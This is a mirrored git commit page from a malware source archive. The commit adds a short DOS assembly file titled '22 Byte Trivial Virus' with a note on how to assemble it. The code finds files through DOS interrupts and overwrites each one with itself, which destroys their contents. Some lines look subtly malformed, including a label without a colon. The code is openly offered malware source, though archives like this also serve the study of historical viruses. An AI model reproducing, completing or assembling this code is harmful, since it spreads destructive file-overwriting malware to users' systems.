mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 07:49:24 +00:00
Add files via upload
This commit is contained in:
@@ -0,0 +1,17 @@
|
||||
;22 Byte Trivial Virus
|
||||
;Use WASM to assemble
|
||||
|
||||
org 100h
|
||||
|
||||
db '*.*',0
|
||||
|
||||
mov ah,4eh
|
||||
Again
|
||||
mov dx,si
|
||||
int 21h
|
||||
mov ah,3ch
|
||||
mov dx,9eh
|
||||
int 21h
|
||||
xchg bx,ax
|
||||
mov ah,40h
|
||||
jmps Again
|
||||
Reference in New Issue
Block a user